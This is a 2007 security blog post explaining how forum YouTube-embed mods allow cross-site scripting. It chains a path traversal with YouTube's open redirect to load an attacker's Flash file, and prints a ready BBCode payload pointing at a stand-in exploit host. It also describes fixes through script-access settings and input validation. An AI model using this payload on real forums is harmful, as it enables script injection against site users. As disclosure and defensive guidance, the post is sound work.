Sunday, September 30, 2007

Universal youtube mods XSS explained in 7 steps

Well, I want to explain first, this was not my idea, someone at irc.irchighway.net/#slackers discussed about this a while ago, but he wasn't able to find a redirection URL at youtube.

A couple of days ago I found such URL, and now I can't remember who was he, please if you read this, send me an e-mail to modify this post for the credits.

[[ UPDATE ]] kuza55 found out that Kyran was the one to come with the idea [[ /UPDATE ]]

Well, discusing this with the guys at w4ck1ng it appears that the vulnerability is rather complex to understand.

  1. First, we know that if we can embed a flash movie into a site, we can make XSS attacks, by means of getURL("javascript:code_here");
  2. Second, we know that we cant embed any arbitrary movie into any forum (at least not by default).
  3. Third, we know there are thousands of forums that have Youtube mods instaled, so their users can link to movies, and watch them without leaving the site.
  4. Fourth, the mods for youtube (at least the ones I found) have no regular expressions for validating that the video linked is valid, and they do: http://www.youtube.com/v/{param_here} thinking, that in such way an attacker wont be able to change the domain.
  5. Fifth, Youtube doesn't have any visible redirection URL that forwards to an arbitrary site, so if you found a redirection page, you could do.. http://www.youtube.com/v/../redirection?page=http://your.swf.exploit/
  6. Sixth, the redirection page inside youtube is http://www.youtube.com/confirm_email?next=http://new.url/
  7. Seventh, using step 4, 5 and 6 the exploit is like this: [youtube=1,1]../confirm_email?next=http://exploit.com/swf[/youtube]
Well, I think that's all.. the easiest way of patching this vulnerability is simply adding a allowScriptAcces="never" in the object tag of your mod.. anyway, attackers will still be able to redirect to their movies, for stopping that you need to make a regular expression that matches the input with ^[a-zA-Z0-9_]{11}$
(like the phpBB mod does)

[EDIT]
List of SMF vulnerable mod's:

Not vulnerable:

Unsafe IPB youtube mod instalation:
[/EDIT]